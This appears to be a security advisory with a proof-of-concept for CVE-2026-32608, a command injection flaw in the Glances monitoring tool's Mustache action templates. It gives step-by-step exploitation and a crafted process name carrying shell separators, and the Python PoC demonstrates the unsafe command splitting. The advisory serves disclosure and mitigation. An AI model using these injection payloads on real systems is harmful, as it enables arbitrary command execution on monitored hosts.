Content *

Overview

A vulnerability tracked as CVE-2026-32608 affects Glances versions up to 4.5.2.

The issue arises from improper handling of user-controlled values in Mustache templates, which are used in action commands such as alerts and triggers.

An attacker can inject malicious shell commands through fields like:

• Process names
• Container names
• Mount points

When these values are rendered into action commands, they can lead to arbitrary command execution.

Affected Software

Vendor: Nicolas Hennion (Project Maintainer)

Affected versions:

• Glances ≤ 4.5.2-dev01
• Confirmed vulnerable: 4.5.1

Fixed in:

• Version 4.5.2

Technical Details

Glances allows administrators to define action commands using Mustache-style templates:

[processlist]
critical_action=echo "ALERT: {{name}}" >> /tmp/alert.log

The vulnerability occurs because:

1. User-controlled values (e.g., process names) are directly injected into templates.
2. These values are not properly sanitized.
3. The command is then passed to a function that attempts to split commands (secure_popen) but fails to neutralize shell metacharacters.

Attackers can inject shell operators such as:

• |
• &&
• >
• ;

This results in command chaining and execution of arbitrary payloads.

Attack Scenario

An attacker creates a malicious process with a crafted name:

cp /bin/sleep "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||"

When Glances processes this name and renders it into the template, the resulting command becomes:

echo "ALERT: innocent|id>/tmp/pwned;whoami>>/tmp/pwned|| used 99% CPU" >> /tmp/alerts.log

This leads to execution of injected commands.

Proof of Concept (PoC)

The following simplified Python code demonstrates how unsafe command parsing leads to injection:

#!/usr/bin/env python3
# Exploit Title:        Glances <= 4.5.2  OS Command Injection via Mustache Template Fields
# CVE:                  CVE-2026-32608
# Date:                 2026-03-18
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Vendor Homepage:      https://github.com/nicolargo/glances
# Software Link:        https://pypi.org/project/glances/
# Affected:             Glances <= 4.5.2-dev01 (pip / source installs)
# Tested on:            Glances 4.5.1
# Category:             Remote
# Platform:             Linux / macOS / Windows (where Glances runs)
# Exploit Type:         Command Injection
# CVSS:                 7.0 (High)
# Description:          Glances insecurely processes user-controlled values (process names, container names, mount points) in Mustache templates used in action commands. Malicious entity names can inject arbitrary OS commands via | && > separators before secure_popen splitting logic.
# Fixed in:             Glances 4.5.2 (commit 6f4ec53d967478e69917078e6f73f448001bf107)
# Usage:
#   python3 exploit.py
#
# Examples:
#   python3 exploit.py
#
# Options:
#   -- (no command-line options implemented in this minimal PoC)
#
# Notes:
#   • Requires Glances to be running with a config containing action commands using {{name}}, {{container_name}} etc.
#   • Attacker must be able to create/rename processes or Docker containers on the target system.
#   • Executes commands as the user running Glances (often root when run as service)
#
# How to Use
#
# Step 1:
#   Install vulnerable version: pip install "glances<4.5.2"
#
# Step 2:
#   Create glances.conf with e.g.:
#     [processlist]
#     critical_action=echo "ALERT: {{name}}" >> /tmp/alert.log
#
# Step 3:
#   Run Glances: glances --config glances.conf
#
# Step 4:
#   Create malicious process:
#     cp /bin/sleep "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||"
#     "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||" 999 &
#
# Step 5:
#   Wait for Glances to evaluate process list and trigger action

import subprocess
import shlex

def vulnerable_secure_popen(cmd: str):
    for sep in ("&&", "|", ">"):
        cmd = cmd.replace(sep, f" {sep} ")
    parts = [p.strip() for p in cmd.split() if p.strip()]
    for part in parts:
        print(f"[EXEC] {part}")

malicious_name = 'innocent|id>/tmp/pwned;whoami>>/tmp/pwned||'
template = 'echo "ALERT: {{name}} used 99% CPU" >> /tmp/alerts.log'
rendered = template.replace('{{name}}', malicious_name)

print("Rendered command:", rendered)
vulnerable_secure_popen(rendered)

How the Exploit Works

The exploit chain is as follows:

1. Attacker controls an entity name (process/container).
2. Name is injected into a Mustache template.
3. Template is rendered into a shell command.
4. Unsafe parsing allows command separators to execute.
5. Arbitrary commands run under the Glances process privileges.

Impact

Successful exploitation may allow attackers to:

• Execute arbitrary OS commands
• Escalate privileges (if Glances runs as root)
• Persist on the system
• Compromise monitoring infrastructure

This is especially critical in:

• DevOps environments
• Container monitoring systems
• Production servers

Mitigation

Recommended actions:

• Upgrade to Glances 4.5.2 or later
• Avoid using unsanitized template variables in action commands
• Restrict process/container naming where possible
• Run Glances with least privileges
• Implement input validation and escaping

Disclosure Timeline

• 2026-03-18 — Vulnerability discovered
• 2026-03-18 — PoC developed
• 2026-03-18 — Reported / fixed upstream
• 2026-03-XX — Public disclosure

Researcher

Security research conducted by:

Mohammed Idrees Banyamer
Cybersecurity Researcher – Jordan 🇯🇴

GitHub: https://github.com/mbanyamer
Instagram: @banyamer_security

Disclaimer

This proof-of-concept is provided for educational purposes and authorized testing only. Unauthorized exploitation is illegal.